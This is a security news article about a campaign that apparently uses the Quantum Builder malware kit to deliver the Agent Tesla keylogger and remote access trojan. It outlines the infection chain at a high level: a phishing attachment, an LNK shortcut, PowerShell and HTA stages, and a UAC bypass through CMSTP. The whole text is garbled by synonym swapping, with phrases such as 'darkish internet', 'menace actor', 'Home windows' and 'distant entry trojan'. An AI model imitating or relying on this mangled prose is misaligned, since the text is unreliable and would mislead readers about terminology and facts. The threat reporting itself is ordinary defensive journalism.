A not too long ago found malware builder bought on the darkish internet, Quantum Builder, is being utilized in a brand new marketing campaign that includes recent techniques to ship the Agent Tesla .NET-based keylogger and distant entry trojan (RAT), in keeping with an alert issued by the ThreatLabz analysis unit of cybersecurity firm Zscaler.
Quantum Builder, also referred to as Quantum LNK Builder, is used to create malicious shortcut information. It has been linked to Lazarus—an APT (superior persistent menace) actor linked to North Korea—on account of shared techniques, strategies, procedures (TTPs) and supply code overlap. “However we can not confidently attribute this marketing campaign to any particular menace actor,” Zscaler famous in a weblog publish.
Agent Tesla was first detected in 2014. Within the present marketing campaign, Quantum Builder is getting used to generate malicious .lnk, .hta, and PowerShell payloads, which then ship Agent Tesla to the focused machines, in keeping with Zscaler.
“This marketing campaign options enhancements and a shift towards LNK (Home windows shortcut) information when in comparison with related assaults previously,” Zscaler famous.
Quantum Builder utilized in a string of latest malware assaults
Risk actors are repeatedly evolving their techniques and making use of malware builders bought on the cybercrime market. “This Agent Tesla marketing campaign is the newest in a string of assaults by which Quantum Builder has been used to create malicious payloads in campaigns towards numerous organizations,” Zscaler famous.
The payloads generated by the builder make use of refined strategies comparable to
person account management bypass utilizing the Microsoft Connection Supervisor Profile Installer (CMSTP) binary to execute the ultimate payload with administrative privileges, and to carry out Home windows defender exclusions.
The brand new malware marketing campaign has additionally been seen using a multistaged an infection chain integrating numerous assault vectors, Zscaler mentioned. It executes PowerShell scripts in-memory to evade detection and can be seen executing decoys to distract victims after units have been contaminated.
New assaults begin with spear phishing e mail
The assault chain begins with a spear-phishing mail that that accommodates a GZIP attachment. The GZIP features a shortcut that’s designed to execute PowerShell code that’s answerable for launching a distant HTML utility utilizing mshta.exe binaries.
The phishing e mail seems to be like it’s from a Chinese language provider of lump and rock sugar—it has a topic line stating “New Order Affirmation – Guangdong Nanz Expertise co. ltd.”—and has a malicious .lnk file with a PDF icon.
As soon as the doc is opened, the HTA file decrypts a PowerShell loader script which decrypts and hundreds one other PowerShell script after performing superior encryption commonplace decryption and GZIP decompression.
The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a distant server, after which executes it with administrative privileges by performing a person account management bypass (UAC) utilizing the CMSTP. Agent Tesla is then executed on the goal machine with administrative privileges.
There was additionally a second variant of Agent Tesla noticed, the place the menace actors used a ZIP file and different refined strategies to cover their actions. Agent Tesla has been lively since 2014, in 2018 it had greater than 6,300 prospects who pay subscription charges to license the software program. At present, Agent Tesla is being bought for $182 a month on the darkish internet, in keeping with Hacker Information.
Quantum builder was first found by Cyble Analysis Labs in June this 12 months on a cybercrime discussion board. The menace actor claimed within the publish that Quantum Builder can spoof any extension and has over 300 completely different icons out there for malicious .lnk information. There was additionally a video posted demonstrating how one can construct .lnk, .hta, and .iso information utilizing the malware builder.
The .hta payload will be created utilizing Quantum Builder by customizing choices comparable to payload url, DLL (dynamic hyperlink library), UAC Bypass, and execution path detaails in addition to a time delay to execute the payload.
Copyright © 2022 IDG Communications, Inc.
